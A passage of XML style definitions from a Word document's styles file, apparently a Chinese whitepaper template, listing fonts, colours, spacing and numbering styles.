      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-Char8">
    <w:name w:val="8lab-注意事项 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8lab-e"/>
    <w:qFormat/>
    <w:rsid w:val="00F35BFF"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:color w:val="FF0000"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Charb"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="180" w:after="180"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Charb">
    <w:name w:val="正文文本 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af8"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="-30">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="62"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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character" w:styleId="af9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="8lab-4">
    <w:name w:val="8lab-4级"/>
    <w:basedOn w:val="-3"/>
    <w:link w:val="8lab-4Char"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
      </w:numPr>
      <w:adjustRightInd/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-4Char">
    <w:name w:val="8lab-4级 Char"/>
    <w:basedOn w:val="4Char"/>
    <w:link w:val="8lab-4"/>
    <w:qFormat/>
    <w:rsid w:val="00304677"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="修订1"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="-31">
    <w:name w:val="浅色网格 - 强调文字颜色 31"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="62"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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character" w:styleId="afc">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-7-">
    <w:name w:val="白皮书-7-表格文字"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="10293D"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-9-0-">
    <w:name w:val="白皮书-9-0-参考/引用"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:adjustRightInd/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="10293D"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-9-1-">
    <w:name w:val="白皮书-9-1-代码"/>
    <w:basedOn w:val="-5-"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>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3F3F3"/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="10293D"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="5-11">
    <w:name w:val="网格表 5 深色 - 着色 11"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="50"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roma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网格表 4 - 着色 11"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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51">
    <w:name w:val="网格表 4 - 着色 51"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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
    <w:name w:val="TableGrid"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="书目1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="37"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bjh-p">
    <w:name w:val="bjh-p"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="af8"/>
    <w:next w:val="af8"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageCaption">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="a4"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:after="120"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CaptionedFigure">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl/>
      <w:spacing w:after="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="22">
    <w:name w:val="修订2"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="修订3"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D73B05"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8lab-f">
    <w:name w:val="8lab-正文 字符"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num2z0">
    <w:name w:val="WW8Num2z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num4z1">
    <w:name w:val="WW8Num4z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z0">
    <w:name w:val="WW8Num5z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z1">
    <w:name w:val="WW8Num5z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z2">
    <w:name w:val="WW8Num5z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z3">
    <w:name w:val="WW8Num5z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z4">
    <w:name w:val="WW8Num5z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z0">
    <w:name w:val="WW8Num7z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z1">
    <w:name w:val="WW8Num7z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z2">
    <w:name w:val="WW8Num7z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z3">
    <w:name w:val="WW8Num7z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z4">
    <w:name w:val="WW8Num7z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num9z0">
    <w:name w:val="WW8Num9z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num11z1">
    <w:name w:val="WW8Num11z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num16z3">
    <w:name w:val="WW8Num16z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z0">
    <w:name w:val="WW8Num18z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z1">
    <w:name w:val="WW8Num18z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z3">
    <w:name w:val="WW8Num18z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num18z5">
    <w:name w:val="WW8Num18z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z0">
    <w:name w:val="WW8Num22z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z1">
    <w:name w:val="WW8Num22z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z2">
    <w:name w:val="WW8Num22z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z3">
    <w:name w:val="WW8Num22z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num22z4">
    <w:name w:val="WW8Num22z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num23z0">
    <w:name w:val="WW8Num23z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num23z2">
    <w:name w:val="WW8Num23z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num28z0">
    <w:name w:val="WW8Num28z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z3">
    <w:name w:val="WW8Num30z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z0">
    <w:name w:val="WW8Num31z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z1">
    <w:name w:val="WW8Num31z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z2">
    <w:name w:val="WW8Num31z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z3">
    <w:name w:val="WW8Num31z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num31z5">
    <w:name w:val="WW8Num31z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num33z1">
    <w:name w:val="WW8Num33z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num34z0">
    <w:name w:val="WW8Num34z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num35z3">
    <w:name w:val="WW8Num35z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num38z3">
    <w:name w:val="WW8Num38z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num39z0">
    <w:name w:val="WW8Num39z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num39z2">
    <w:name w:val="WW8Num39z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z0">
    <w:name w:val="WW8Num40z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z1">
    <w:name w:val="WW8Num40z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z2">
    <w:name w:val="WW8Num40z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z3">
    <w:name w:val="WW8Num40z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num40z5">
    <w:name w:val="WW8Num40z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num49z3">
    <w:name w:val="WW8Num49z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num50z3">
    <w:name w:val="WW8Num50z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num51z0">
    <w:name w:val="WW8Num51z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z0">
    <w:name w:val="WW8Num54z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z1">
    <w:name w:val="WW8Num54z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z3">
    <w:name w:val="WW8Num54z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num54z5">
    <w:name w:val="WW8Num54z5"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num58z1">
    <w:name w:val="WW8Num58z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num59z1">
    <w:name w:val="WW8Num59z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z0">
    <w:name w:val="WW8Num61z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z1">
    <w:name w:val="WW8Num61z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z2">
    <w:name w:val="WW8Num61z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
